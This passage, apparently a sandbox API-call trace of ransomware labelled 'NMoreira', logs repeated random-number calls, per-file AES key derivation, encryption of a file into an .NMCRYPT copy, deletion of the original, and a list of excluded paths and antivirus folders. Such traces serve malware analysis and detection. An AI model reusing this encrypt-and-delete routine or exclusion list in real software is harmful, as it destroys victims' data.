dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.026] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.027] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.028] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.029] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x1d445310*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.030] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x1d445410*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0163.030] CryptCreateHash (in: hProv=0x8e33b8, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x1d4448cc | out: phHash=0x1d4448cc) returned 1 [0163.030] CryptHashData (hHash=0x9ad478, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0163.030] CryptDeriveKey (in: hProv=0x8e33b8, Algid=0x6610, hBaseData=0x9ad478, dwFlags=0x4, phKey=0x1d4448d0 | out: phKey=0x1d4448d0*=0x9ad678) returned 1 [0163.030] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0163.030] CryptSetKeyParam (hKey=0x9ad678, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0163.031] wcslen (_String="\\\\?\\") returned 0x4 [0163.031] CryptDuplicateKey (in: hKey=0x9ad678, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x9ad278) returned 1 [0163.031] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0163.031] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1624 [0163.031] GetFileSizeEx (in: hFile=0x1624, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=231) returned 1 [0163.031] WriteFile (in: hFile=0x588, lpBuffer=0x1d445310*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d445310*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0163.032] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0xe7, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0xe7, lpOverlapped=0x0) returned 1 [0163.033] CryptEncrypt (in: hKey=0x9ad278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xe7, dwBufLen=0xa00 | out: pbData=0x1d466dc8*, pdwDataLen=0x2d7e628*=0xf0) returned 1 [0163.033] GetLastError () returned 0x0 [0163.033] WriteFile (in: hFile=0x588, lpBuffer=0x1d466dc8*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x1d466dc8*, lpNumberOfBytesWritten=0x2d7e63c*=0xf0, lpOverlapped=0x0) returned 1 [0163.069] ReadFile (in: hFile=0x1624, lpBuffer=0x2974d38, nNumberOfBytesToRead=0x0, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesRead=0x2d7e640*=0x0, lpOverlapped=0x0) returned 1 [0163.069] WriteFile (in: hFile=0x588, lpBuffer=0x2974d38*, nNumberOfBytesToWrite=0x0, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x2974d38*, lpNumberOfBytesWritten=0x2d7e63c*=0x0, lpOverlapped=0x0) returned 1 [0163.069] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm")) returned 0x20 [0163.069] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm", dwFileAttributes=0x20) returned 0 [0163.069] PathFileExistsW (pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned 1 [0163.069] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm")) returned 0 [0163.070] wcscpy (in: _Dest=0x2d7e194, _Source="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" | out: _Dest="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm") returned="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" [0163.070] PathRemoveFileSpecW (in: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" | out: pszPath="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery") returned 1 [0163.070] GetTempFileNameW (in: lpPathName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery", lpPrefixString=".xX", uUnique=0x0, lpTempFileName=0x2d7e39c | out: lpTempFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF064.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf064.tmp")) returned 0xf064 [0163.070] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\garden.htm"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF064.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf064.tmp"), dwFlags=0x1) returned 0 [0163.071] DeleteFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\.xXF064.tmp" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\.xxf064.tmp")) returned 1 [0163.071] CryptDestroyKey (hKey=0x9ad278) returned 1 [0163.071] wcslen (_String="OK") returned 0x2 [0163.071] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.071] fflush (in: _File=0x77ac1228 | out: _File=0x77ac1228) returned 0 [0163.071] CryptDestroyKey (hKey=0x9ad678) returned 1 [0163.071] CryptDestroyHash (hHash=0x9ad478) returned 1 [0163.071] CryptReleaseContext (hProv=0x8e33b8, dwFlags=0x0) returned 1 [0163.071] FindNextFileW (in: hFindFile=0x9ad238, lpFindFileData=0x2d7e89c | out: lpFindFileData=0x2d7e89c) returned 1 [0163.071] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*NMCRYPT") returned 0 [0163.071] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*Recovers your files.html") returned 0 [0163.071] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*.exe") returned 0 [0163.071] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*.dll") returned 0 [0163.071] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*.lnk") returned 0 [0163.071] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*.bat") returned 0 [0163.071] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*.ini") returned 0 [0163.071] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*.msi") returned 0 [0163.071] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*.scf") returned 0 [0163.071] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*pagefile.sys*") returned 0 [0163.071] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*NTUSER.DAT*") returned 0 [0163.071] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*AppData*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*\\winrar\\*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*\\Internet Explorer\\*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*\\java\\*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*\\TeamViewer\\*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*\\windows\\*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*\\ESET\\*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*\\AVG\\*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*\\AVIRA\\*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*\\AVAST Software\\*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*Atheros*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*Realtek*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*bootmgr*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*boot*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*boot*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*CONFIG.SYS*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*IO.SYS*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*MSDOS.SYS*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*NTDETECT.COM*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*ntldr*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*chrome*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*opera*") returned 0 [0163.072] PathMatchSpecW (pszFile="Garden.jpg", pszSpec="*firefox*") returned 0 [0163.072] PathMatchSpecW (pszFile="C:\\Program Files\\Common Files\\microsoft shared\\Stationery\\Garden.jpg", pszSpec="*") returned 1 [0163.072] strlen (_Str="NMoreira") returned 0x8 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0163.072] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, 